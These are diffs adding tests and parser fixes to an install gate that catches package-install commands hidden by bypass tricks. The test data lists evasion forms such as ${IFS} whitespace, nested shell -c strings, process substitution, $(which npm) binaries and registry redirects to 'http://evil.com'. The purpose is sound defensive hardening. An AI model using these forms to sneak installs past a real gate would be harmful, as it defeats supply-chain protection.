+    // `npx npm i evil` runs npm's install for real; the runner alone would gate only npm:npm.
+    for (const cmd of [
+      "npx npm i evil",
+      "pnpm exec npm i evil",
+      "yarn dlx npm i evil",
+      "npm exec npm i evil",
+      "corepack pnpm@9 exec yarn add evil",
+      "npx pip install evil",
+    ]) {
+      assert.ok(
+        parseInstallCommand(cmd).refs.includes("npm:evil") ||
+          parseInstallCommand(cmd).refs.includes("pip:evil"),
+        cmd,
+      );
+    }
+    // a normal runner fetching a real tool is unaffected (gates the tool, no over-trigger)
+    assert.deepEqual(parseInstallCommand("npx tsc --build").refs, ["npm:tsc"]);
+    assert.deepEqual(parseInstallCommand("npx create-react-app myapp").refs, [
+      "npm:create-react-app",
+    ]);
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -294,6 +294,21 @@ describe("parseInstallCommand — bypass resistance (security)", () => {
     // no version → bare name (unchanged)
     assert.deepEqual(refs("npm i express"), ["npm:express"]);
   });
+
+  it("an npm alias/protocol spec is fail-closed, not triaged as the innocent name (B2)", () => {
+    // `lodash-x@npm:express@4` INSTALLS express but names lodash-x — must NOT triage lodash-x.
+    for (const cmd of [
+      "npm i lodash-x@npm:express@4",
+      "npm i foo@git+ssh://h/r",
+      "npm i a@file:./x",
+    ]) {
+      const p = parseInstallCommand(cmd);
+      assert.equal(p.refs.length, 0, cmd);
+      assert.equal(p.unverifiable.length, 1, cmd);
+    }
+    // a `v`-prefixed version is still carried (triage strips the v and resolves it)
+    assert.deepEqual(parseInstallCommand("npm i evil@v1.2.3").refs, ["npm:evil@v1.2.3"]);
+  });
 });
 
 describe("parseInstallCommand — sweep hardening (bypass closes)", () => {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -606,6 +606,10 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
       "npm exec npm i evil",
       "corepack pnpm@9 exec yarn add evil",
       "npx pip install evil",
+      // flags / `--` between the runner and the inner manager must not let it escape
+      "npx -y npm i evil",
+      "npx --yes npm i evil",
+      "npm exec -- npm i evil",
     ]) {
       assert.ok(
         parseInstallCommand(cmd).refs.includes("npm:evil") ||

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -559,6 +559,25 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.equal(parseInstallCommand("corepack install").isInstall, false);
   });
 
+  it("corepack version-pinned dispatch (pnpm@9) resolves to the real manager", () => {
+    // `corepack pnpm@9 add evil` leaves argv0 `pnpm@9` after the wrapper strip; binBase now
+    // drops the @version so the matcher fires.
+    assert.deepEqual(parseInstallCommand("corepack pnpm@9 add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("corepack yarn@1.22.19 add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("corepack npm@10 i evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("corepack pnpm@8 dlx evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("sudo corepack pnpm@latest add evil").refs, ["npm:evil"]);
+    // version-pinned + registry redirect still fails closed on the redirect
+    const redir = parseInstallCommand("corepack pnpm@9 add evil --registry http://evil");
+    assert.equal(redir.isInstall, true);
+    assert.ok(redir.unverifiable.some((u) => u.startsWith("alt-registry:")));
+    // benign version-pinned management commands are NOT installs
+    assert.equal(parseInstallCommand("corepack use pnpm@9").isInstall, false);
+    assert.equal(parseInstallCommand("corepack prepare pnpm@9 --activate").isInstall, false);
+    // a scoped/versioned PACKAGE arg is unaffected (only argv0 is @-stripped)
+    assert.deepEqual(parseInstallCommand("npm i @scope/pkg@1").refs, ["npm:@scope/pkg"]);
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -282,6 +282,69 @@ describe("parseInstallCommand — bypass resistance (security)", () => {
   });
 });
 
+describe("parseInstallCommand — sweep hardening (bypass closes)", () => {
+  const gated = (cmd: string) => {
+    const p = parseInstallCommand(cmd);
+    return p.isInstall && (p.refs.length > 0 || p.unverifiable.length > 0);
+  };
+
+  it("intra-word quoting no longer hides the binary/subcommand", () => {
+    assert.deepEqual(parseInstallCommand('n"p"m install evil').refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand('npm i"nstall" evil').refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("np'm' i evil").refs, ["npm:evil"]);
+  });
+
+  it("path- and backslash-qualified package managers are matched (basename)", () => {
+    assert.deepEqual(parseInstallCommand("/usr/bin/npm install evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("./node_modules/.bin/pnpm add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("\\npm install evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("/usr/bin/sudo /usr/bin/npm i evil").refs, ["npm:evil"]);
+  });
+
+  it("process substitution and here-strings are recursed", () => {
+    assert.deepEqual(parseInstallCommand("cat <(npm install evil)").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("diff <(npm i evil) /dev/null").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand('bash <<< "npm i evil"').refs, ["npm:evil"]);
+  });
+
+  it("fetch-and-run verbs are covered (init/create/uvx/uv tool/pipx run/npm x)", () => {
+    assert.deepEqual(parseInstallCommand("npm init evil").refs, ["npm:create-evil"]);
+    assert.deepEqual(parseInstallCommand("npm create evil").refs, ["npm:create-evil"]);
+    assert.deepEqual(parseInstallCommand("yarn create evil").refs, ["npm:create-evil"]);
+    assert.deepEqual(parseInstallCommand("npm x evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("uvx evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("uv tool install evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("uv tool run evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("pipx run evil").refs, ["pip:evil"]);
+  });
+
+  it("builtin wrapper is stripped", () => {
+    assert.deepEqual(parseInstallCommand("builtin npm i evil").refs, ["npm:evil"]);
+  });
+
+  it("xargs-stdin and $VAR-indirected installs fail closed (unverifiable)", () => {
+    const x = parseInstallCommand("echo evil | xargs npm i");
+    assert.equal(x.isInstall, true);
+    assert.ok(x.unverifiable.includes("xargs-stdin-install"));
+    const v = parseInstallCommand("PM=npm; $PM install evil");
+    assert.equal(v.isInstall, true);
+    assert.ok(v.unverifiable.some((u) => u.startsWith("indirect-bin:")));
+    assert.ok(gated("echo evil | xargs npm i") && gated("PM=npm; $PM install evil"));
+  });
+
+  it("does NOT over-trigger: comments, requirement files, and runner args", () => {
+    // trailing comment stripped — only the real package is triaged, no bogus refs
+    assert.deepEqual(parseInstallCommand("npm i react # installs react").refs, ["npm:react"]);
+    // -r/-e file operands are not packages
+    const r = parseInstallCommand("pip install -r requirements.txt");
+    assert.deepEqual(r.refs, []);
+    assert.deepEqual(r.unverifiable, []);
+    // a runner's trailing args are NOT packages (only the fetched tool is)
+    assert.deepEqual(parseInstallCommand("npx cowsay moo").refs, ["npm:cowsay"]);
+    assert.deepEqual(parseInstallCommand("npm create vite myapp").refs, ["npm:create-vite"]);
+  });
+});
+
 // Fake triage: pass everything except names in `blocklist`.
 function fakeDeps(blocklist: string[] = []): GateDeps {
   return {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -528,6 +528,39 @@ describe("parseInstallCommand — round-4 bypass closes", () => {
   });
 });
 
+describe("parseInstallCommand — round-5 bypass closes", () => {
+  it("$IFS / ${IFS} whitespace obfuscation is normalized before tokenizing", () => {
+    // `${IFS}` expands to whitespace, so this really runs `npm i evil`.
+    assert.deepEqual(parseInstallCommand("npm${IFS}i${IFS}evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm${IFS}install${IFS}evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("pip${IFS}install${IFS}evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("npm$IFS'i'$IFS'evil'").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("X=1 npm${IFS}i${IFS}evil").refs, ["npm:evil"]);
+    // even nested inside a shell -c
+    assert.deepEqual(parseInstallCommand("sh -c 'npm${IFS}i${IFS}evil'").refs, ["npm:evil"]);
+    // a different variable ($IFS2) is NOT collapsed
+    assert.equal(parseInstallCommand("npm$IFS2i").isInstall, false);
+  });
+
+  it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
+    for (const cmd of [
+      'npm exec -c "npm i evil"',
+      'npm exec --call "npm i evil"',
+      'pnpm exec -c "npm i evil"',
+      'pnpm dlx -c "npm i evil"',
+      'yarn exec -c "npm i evil"',
+      'bun x -c "npm i evil"',
+    ]) {
+      // the inner install is gated; the runner does NOT gate the shell string's first word
+      assert.deepEqual(parseInstallCommand(cmd).refs, ["npm:evil"], cmd);
+    }
+    // exec WITHOUT a call flag still gates the fetched tool positionally
+    assert.deepEqual(parseInstallCommand("npm exec cowsay").refs, ["npm:cowsay"]);
+    // --package alongside -c: the package is still gated, the call string recursed
+    assert.deepEqual(parseInstallCommand('npm exec --package=evil -c "cmd"').refs, ["npm:evil"]);
+  });
+});
+
 // Fake triage: pass everything except names in `blocklist`.
 function fakeDeps(blocklist: string[] = []): GateDeps {
   return {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -478,6 +478,56 @@ describe("parseInstallCommand — round-3 bypass closes", () => {
   });
 });
 
+describe("parseInstallCommand — round-4 bypass closes", () => {
+  it("a -c glued into a shell short-flag cluster is still recursed (bash -lc / -xc / -cl)", () => {
+    // `bash -lc '…'` (login) is the canonical cron/CI form — must not slip the gate.
+    for (const cmd of [
+      'bash -lc "npm i evil"',
+      'sh -xc "npm i evil"',
+      'bash -ic "npm i evil"',
+      'sh -uxc "npm i evil"',
+      'bash -cl "npm i evil"',
+      '/usr/bin/env -S bash -lc "npm i evil"',
+    ]) {
+      assert.deepEqual(parseInstallCommand(cmd).refs, ["npm:evil"], cmd);
+    }
+    // still NOT a shell invocation → not gated
+    assert.equal(parseInstallCommand('git commit -m "use -c flag"').isInstall, false);
+    assert.equal(parseInstallCommand("git commit -c HEAD").isInstall, false);
+  });
+
+  it("an ANSI-C / locale $'…' shell -c argument is recursed", () => {
+    assert.deepEqual(parseInstallCommand("bash -c $'npm i evil'").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand('bash -c $"pip install evil"').refs, ["pip:evil"]);
+  });
+
+  it("npm ci|clean-install with a registry redirect fails closed; bare ci is benign", () => {
+    for (const cmd of ["npm ci --registry evil", "npm clean-install --registry evil"]) {
+      const p = parseInstallCommand(cmd);
+      assert.equal(p.isInstall, true, cmd);
+      assert.ok(
+        p.unverifiable.some((u) => u.startsWith("alt-registry:")),
+        cmd,
+      );
+    }
+    assert.equal(parseInstallCommand("npm ci").isInstall, false);
+    assert.equal(parseInstallCommand("npm clean-install").isInstall, false);
+  });
+
+  it("pip requirement-flag skipping does NOT eat an npm/yarn positional package", () => {
+    // `-r`/`-c`/`-e` are pip file-flags; on npm they aren't valueless-consuming, so the
+    // package after them must still be gated (previously dropped by the global compactor).
+    assert.deepEqual(parseInstallCommand("npm i -e evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm i -c evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm i -r evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("yarn add -e evil").refs, ["npm:evil"]);
+    // pip requirement files are still correctly skipped (not mis-triaged as packages)
+    const r = parseInstallCommand("pip install -r requirements.txt");
+    assert.deepEqual(r.refs, []);
+    assert.deepEqual(r.unverifiable, []);
+  });
+});
+
 // Fake triage: pass everything except names in `blocklist`.
 function fakeDeps(blocklist: string[] = []): GateDeps {
   return {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -70,14 +70,15 @@ describe("parseInstallCommand — detection", () => {
 
   it("pnpm / yarn / bun add", () => {
     assert.deepEqual(refs("pnpm add react react-dom"), ["npm:react", "npm:react-dom"]);
-    assert.deepEqual(refs("yarn add lodash@4.17.21"), ["npm:lodash"]); // version stripped
+    assert.deepEqual(refs("yarn add lodash@4.17.21"), ["npm:lodash@4.17.21"]); // version carried
     assert.deepEqual(refs("bun add zod"), ["npm:zod"]);
   });
 
-  it("scoped packages keep the scope, drop the version", () => {
+  it("scoped packages keep the scope AND the pinned version", () => {
     assert.deepEqual(refs("npm install @modelcontextprotocol/sdk@1.2.3"), [
-      "npm:@modelcontextprotocol/sdk",
+      "npm:@modelcontextprotocol/sdk@1.2.3",
     ]);
+    assert.deepEqual(refs("npm i @scope/pkg"), ["npm:@scope/pkg"]); // no version → bare
   });
 
   it("npx / bunx execution is gated (first non-flag token)", () => {
@@ -88,7 +89,7 @@ describe("parseInstallCommand — detection", () => {
 
   it("pip / pip3 / pipx / uv / python -m pip", () => {
     assert.deepEqual(refs("pip install requests"), ["pip:requests"]);
-    assert.deepEqual(refs("pip3 install Flask>=2.0"), ["pip:Flask"]); // version spec stripped
+    assert.deepEqual(refs("pip3 install Flask>=2.0"), ["pip:Flask>=2.0"]); // version spec carried
     assert.deepEqual(refs("pipx install black"), ["pip:black"]);
     assert.deepEqual(refs("uv add httpx"), ["pip:httpx"]);
     assert.deepEqual(refs("uv pip install numpy"), ["pip:numpy"]);
@@ -278,7 +279,20 @@ describe("parseInstallCommand — bypass resistance (security)", () => {
 
   it("quoted package names are handled (no false-positive block)", () => {
     assert.deepEqual(parseInstallCommand("npm i 'express'").refs, ["npm:express"]);
-    assert.deepEqual(parseInstallCommand('npm i "lodash@4"').refs, ["npm:lodash"]);
+    assert.deepEqual(parseInstallCommand('npm i "lodash@4"').refs, ["npm:lodash@4"]);
+  });
+
+  it("carries the pinned version/tag onto the ref so triage checks THAT version (B2)", () => {
+    const refs = (c: string) => parseInstallCommand(c).refs;
+    // a clean `latest` can hide a yanked/malicious pinned version — the ref must carry it
+    assert.deepEqual(refs("npm i evil@1.2.3"), ["npm:evil@1.2.3"]);
+    assert.deepEqual(refs("npm i left-pad@0.0.3 react@18"), ["npm:left-pad@0.0.3", "npm:react@18"]);
+    assert.deepEqual(refs("npm i foo@next"), ["npm:foo@next"]); // dist-tag carried
+    assert.deepEqual(refs("pip install requests==2.0.0"), ["pip:requests==2.0.0"]);
+    assert.deepEqual(refs("npx create-react-app@5 myapp"), ["npm:create-react-app@5"]); // runner
+    assert.deepEqual(refs("npm create vite@4 app"), ["npm:create-vite@4"]); // initiator + version
+    // no version → bare name (unchanged)
+    assert.deepEqual(refs("npm i express"), ["npm:express"]);
   });
 });
 
@@ -574,8 +588,8 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     // benign version-pinned management commands are NOT installs
     assert.equal(parseInstallCommand("corepack use pnpm@9").isInstall, false);
     assert.equal(parseInstallCommand("corepack prepare pnpm@9 --activate").isInstall, false);
-    // a scoped/versioned PACKAGE arg is unaffected (only argv0 is @-stripped)
-    assert.deepEqual(parseInstallCommand("npm i @scope/pkg@1").refs, ["npm:@scope/pkg"]);
+    // argv0 @-strip is bin-only; a scoped/versioned PACKAGE keeps scope AND pinned version
+    assert.deepEqual(parseInstallCommand("npm i @scope/pkg@1").refs, ["npm:@scope/pkg@1"]);
   });
 
   it("version-pinned exec -c recurses the shell string (corepack pnpm@9 exec -c)", () => {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -624,6 +624,18 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     ]);
   });
 
+  it("chaining flag-tolerance is ReDoS-safe (no catastrophic backtracking)", () => {
+    // A long run of `-x=y`-shaped tokens with no trailing package manager forced the earlier
+    // regex (overlapping `-\S+` / `\S+=\S+` alternatives) into 2^N parse paths. The mutually
+    // exclusive alternatives make it linear — this completes near-instantly instead of hanging.
+    const cmd = "npm exec " + "-x=y ".repeat(400) + "sometool";
+    const start = process.hrtime.bigint();
+    const p = parseInstallCommand(cmd);
+    const ms = Number(process.hrtime.bigint() - start) / 1e6;
+    assert.ok(ms < 500, `parse took ${ms}ms — possible ReDoS regression`);
+    assert.deepEqual(p.refs, ["npm:sometool"]);
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -332,6 +332,68 @@ describe("parseInstallCommand — sweep hardening (bypass closes)", () => {
     assert.ok(gated("echo evil | xargs npm i") && gated("PM=npm; $PM install evil"));
   });
 
+  it("CRITICAL: a manager flag BEFORE the subcommand no longer hides the install", () => {
+    // `npm -g install evil` shifted the verb past the fixed-index matchers → allowed.
+    assert.deepEqual(parseInstallCommand("npm -g install evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm --global i evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("sudo npm -g install evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("pnpm -g add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("yarn --verbose add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("pip -q install evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("pip --disable-pip-version-check install evil").refs, [
+      "pip:evil",
+    ]);
+    assert.deepEqual(parseInstallCommand("uv --quiet add evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("python -m pip -q install evil").refs, ["pip:evil"]);
+    // structural `python -m pip` still works after flag-compaction
+    assert.deepEqual(parseInstallCommand("python -m pip install pandas").refs, ["pip:pandas"]);
+  });
+
+  it("a flag-form registry redirect (equals form) is caught + userconfig/globalconfig", () => {
+    for (const cmd of [
+      "npm --registry=http://evil.com install express",
+      "npm i express --userconfig=./evil.npmrc",
+      "npm i express --globalconfig=/tmp/evil.npmrc",
+    ]) {
+      const p = parseInstallCommand(cmd);
+      assert.equal(p.isInstall, true, cmd);
+      assert.ok(
+        p.unverifiable.some((u) => u.startsWith("alt-registry:")),
+        cmd,
+      );
+    }
+  });
+
+  it("gates the -p/--package/--spec/--from package, not the run-command (runner)", () => {
+    assert.deepEqual(parseInstallCommand("npx --package=evil somecmd").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npx -p evil somecmd").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm exec --package=evil -- somecmd").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("pnpm dlx --package evil somecmd").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("uvx --from=evil cmd").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("pipx run --spec=evil cmd").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("uv tool run --from evil cmd").refs, ["pip:evil"]);
+  });
+
+  it("covers pip wheel/download and poetry/pdm add (PyPI code execution)", () => {
+    assert.deepEqual(parseInstallCommand("pip wheel evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("pip download evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("poetry add evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("pdm add evil").refs, ["pip:evil"]);
+  });
+
+  it("fails closed on a command-substitution binary", () => {
+    for (const cmd of ["$(which npm) i evil", "`which npm` i evil"]) {
+      const p = parseInstallCommand(cmd);
+      assert.equal(p.isInstall, true, cmd);
+      assert.ok(
+        p.unverifiable.some((u) => u.startsWith("indirect-bin:")),
+        cmd,
+      );
+    }
+    // a var-PREFIXED real path is NOT dynamic → no false positive
+    assert.equal(gated("$HOME/bin/mytool run build"), false);
+  });
+
   it("does NOT over-trigger: comments, requirement files, and runner args", () => {
     // trailing comment stripped — only the real package is triaged, no bogus refs
     assert.deepEqual(parseInstallCommand("npm i react # installs react").refs, ["npm:react"]);

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -676,6 +676,29 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.deepEqual(parseInstallCommand('npm exec --package=evil -c "cmd"').refs, ["npm:evil"]);
   });
 
+  it("a backslash-escaped quote inside a nested shell -c does not end the arg early", () => {
+    // `sh -c "sh -c \"npm i evil\""` — the escaped inner quotes are NOT the closer, so the
+    // inner install must still be recursed and gated (across shell -c, exec -c, and eval).
+    assert.deepEqual(parseInstallCommand('sh -c "sh -c \\"npm i evil\\""').refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand('bash -c "bash -lc \\"pip install evil\\""').refs, [
+      "pip:evil",
+    ]);
+    assert.deepEqual(parseInstallCommand('npm exec -c "sh -c \\"npm i evil\\""').refs, [
+      "npm:evil",
+    ]);
+    // the single-quote inner form and plain forms still work
+    assert.deepEqual(parseInstallCommand("sh -c \"sh -c 'npm i evil'\"").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand('bash -c "npm i evil"').refs, ["npm:evil"]);
+  });
+
+  it("escaped-quote body regex is ReDoS-safe (backslash run stays linear)", () => {
+    const cmd = 'bash -c "' + "\\".repeat(200000);
+    const start = process.hrtime.bigint();
+    parseInstallCommand(cmd);
+    const ms = Number(process.hrtime.bigint() - start) / 1e6;
+    assert.ok(ms < 500, `parse took ${ms}ms — possible ReDoS regression`);
+  });
+
   it("a -c AFTER the exec command is the TOOL's flag — the package is still gated", () => {
     // `npm exec jest -c jest.config.js`: -c belongs to jest; jest is a fetched package that
     // must NOT be suppressed. Only a -c/--call BEFORE the command is npm's shell-call flag.

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -407,6 +407,77 @@ describe("parseInstallCommand — sweep hardening (bypass closes)", () => {
   });
 });
 
+describe("parseInstallCommand — round-3 bypass closes", () => {
+  const gated = (cmd: string) => {
+    const p = parseInstallCommand(cmd);
+    return p.isInstall && (p.refs.length > 0 || p.unverifiable.length > 0);
+  };
+
+  it("uv run --with fetches a package; a plain uv run script does not", () => {
+    // `--with` installs+executes an arbitrary PyPI package before the script runs.
+    assert.deepEqual(parseInstallCommand("uv run --with evil script.py").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("uv run --with=evil script.py").refs, ["pip:evil"]);
+    // the positional is a LOCAL script, never gated; no --with → not an install at all.
+    const plain = parseInstallCommand("uv run script.py");
+    assert.equal(plain.isInstall, false);
+    assert.deepEqual(plain.refs, []);
+  });
+
+  it("yarn global add|install is matched (verb at index 2)", () => {
+    assert.deepEqual(parseInstallCommand("yarn global add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("yarn global install evil").refs, ["npm:evil"]);
+  });
+
+  it("glued python -mpip / -m=pip is expanded and gated", () => {
+    assert.deepEqual(parseInstallCommand("python -mpip install evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("python3 -mpip install evil").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand("python -m=pip install evil").refs, ["pip:evil"]);
+  });
+
+  it("runner --with adds a SECOND fetched package (order-independent)", () => {
+    // both the tool AND the --with package are fetched — gate both, whatever the order.
+    assert.deepEqual(parseInstallCommand("uvx --with evil sometool").refs, [
+      "pip:sometool",
+      "pip:evil",
+    ]);
+    assert.deepEqual(parseInstallCommand("uvx sometool --with evil").refs, [
+      "pip:sometool",
+      "pip:evil",
+    ]);
+  });
+
+  it("npm install-test|it and update|upgrade with a named package are gated", () => {
+    assert.deepEqual(parseInstallCommand("npm install-test evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm it evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm update left-pad").refs, ["npm:left-pad"]);
+    assert.deepEqual(parseInstallCommand("npm upgrade left-pad").refs, ["npm:left-pad"]);
+    // bare update (no package) reinstalls declared deps → not an add
+    assert.equal(parseInstallCommand("npm update").isInstall, false);
+  });
+
+  it("bare reinstall + registry redirect fails closed (no named package)", () => {
+    // `npm i --registry evil` pulls attacker tarballs even with no package argument.
+    const p = parseInstallCommand("npm i --registry evil-pkg");
+    assert.equal(p.isInstall, true);
+    assert.ok(p.unverifiable.some((u) => u.startsWith("alt-registry:")));
+    assert.deepEqual(p.refs, []);
+    // a truly bare reinstall is still benign
+    assert.equal(parseInstallCommand("npm i").isInstall, false);
+    assert.equal(parseInstallCommand("npm ci").isInstall, false);
+  });
+
+  it("does NOT false-positive on an install phrase in a non-shell -c argument", () => {
+    // `-c` is only a shell script when a shell binary precedes it; an unrelated command's
+    // quoted arg that merely contains `-c`/an install phrase must not be gated.
+    assert.equal(gated('git commit -m "used the -c flag today"'), false);
+    assert.equal(gated('git commit -m "npm install evil"'), false);
+    // a real shell -c IS still recursed into
+    assert.deepEqual(parseInstallCommand('bash -c "npm i evil"').refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("sh -c 'pip install evil'").refs, ["pip:evil"]);
+    assert.deepEqual(parseInstallCommand('bash -euo pipefail -c "npm i evil"').refs, ["npm:evil"]);
+  });
+});
+
 // Fake triage: pass everything except names in `blocklist`.
 function fakeDeps(blocklist: string[] = []): GateDeps {
   return {

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -542,6 +542,23 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.equal(parseInstallCommand("npm$IFS2i").isInstall, false);
   });
 
+  it("$IFS parameter-expansion forms (${IFS:0:1}, ${IFS%%x}) also word-split", () => {
+    assert.deepEqual(parseInstallCommand("npm${IFS:0:1}i${IFS:0:1}evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm${IFS%%x}i${IFS%%x}evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("npm${IFS#}i${IFS#}evil").refs, ["npm:evil"]);
+    // a benign `$IFS` mention is not a false positive
+    assert.equal(parseInstallCommand("echo $IFS variable").isInstall, false);
+  });
+
+  it("corepack wrapper is stripped so the real package manager is gated", () => {
+    assert.deepEqual(parseInstallCommand("corepack pnpm add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("corepack yarn add evil").refs, ["npm:evil"]);
+    assert.deepEqual(parseInstallCommand("corepack npm install evil").refs, ["npm:evil"]);
+    // corepack's own subcommands are not installs
+    assert.equal(parseInstallCommand("corepack enable").isInstall, false);
+    assert.equal(parseInstallCommand("corepack install").isInstall, false);
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -136,7 +136,12 @@ function dequote(tok: string): string {
 function binBase(tok: string): string {
   const noEsc = tok.replace(/^\\+/, "");
   const base = noEsc.split("/").pop();
-  return base && base.length > 0 ? base : noEsc;
+  const resolved = base && base.length > 0 ? base : noEsc;
+  // Strip a trailing `@version` — corepack's `pnpm@9` / `yarn@1.22.19` dispatch syntax leaves
+  // that as argv0 after the wrapper is stripped, so `t[0] === "pnpm"` never matched. Only bin
+  // names flow through binBase (never package args), so a scoped/versioned package like
+  // `@scope/pkg@1` is unaffected.
+  return resolved.replace(/@.+$/, "");
 }
 
 /**

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -211,12 +211,14 @@ function nestedCommands(command: string): string[] {
   const out: string[] = [];
   for (const m of command.matchAll(/\$\(([^()]{1,2000})\)/g)) out.push(m[1]);
   for (const m of command.matchAll(/`([^`]{1,2000})`/g)) out.push(m[1]);
-  // `sh -c '…'` / `bash -euo pipefail -c "…"` — the quoted arg to a SHELL's `-c` is executed,
-  // so recurse into it. Anchored to a shell binary (optionally path-qualified, with flags
-  // between) rather than any `-c` anywhere: a bare `-c` in an unrelated command's quoted
-  // argument (`git commit -m "…-c…"`) isn't a shell invocation and must not be gated.
+  // `sh -c '…'` / `bash -lc "…"` / `bash -euo pipefail -c $'…'` — the quoted arg to a SHELL's
+  // `-c` is executed, so recurse into it. Anchored to a shell binary (optionally path-qualified,
+  // with flags between) rather than any `-c` anywhere: a bare `-c` in an unrelated command's
+  // quoted argument (`git commit -m "…-c…"`) isn't a shell invocation and must not be gated.
+  // `-[A-Za-z]*c[A-Za-z]*` matches `-c` glued into a short-flag cluster (`-lc`/`-xc`/`-cl`,
+  // the common cron/CI form); `\$?` accepts an ANSI-C/locale `$'…'`/`$"…"` command arg.
   for (const m of command.matchAll(
-    /(?:^|\s)(?:\S*\/)?(?:sh|bash|zsh|dash|ksh|ash|fish)(?:\s+\S+)*?\s+-c\s+(['"])([\s\S]{1,2000}?)\1/g,
+    /(?:^|\s)(?:\S*\/)?(?:sh|bash|zsh|dash|ksh|ash|fish)(?:\s+\S+)*?\s+-[A-Za-z]*c[A-Za-z]*\s+\$?(['"])([\s\S]{1,2000}?)\1/g,
   )) {
     out.push(m[2]);
   }
@@ -380,8 +382,13 @@ const MATCHERS: Matcher[] = [
     argStart: (t) => {
       const bin = t[0];
       // install-test|it also install the named package (then run tests); update|upgrade
-      // re-fetch untriaged tarballs at attacker-chosen versions — all gated like install.
-      if (bin === "npm" && /^(install|i|add|install-test|it|update|upgrade)$/.test(t[1] ?? ""))
+      // re-fetch untriaged tarballs at attacker-chosen versions; ci|clean-install do a full
+      // lockfile install (running postinstall) — all gated like install. `ci` takes no
+      // package operand, so it only matters for the bare-reinstall + registry-redirect check.
+      if (
+        bin === "npm" &&
+        /^(install|i|add|install-test|it|update|upgrade|ci|clean-install)$/.test(t[1] ?? "")
+      )
         return 2;
       if (
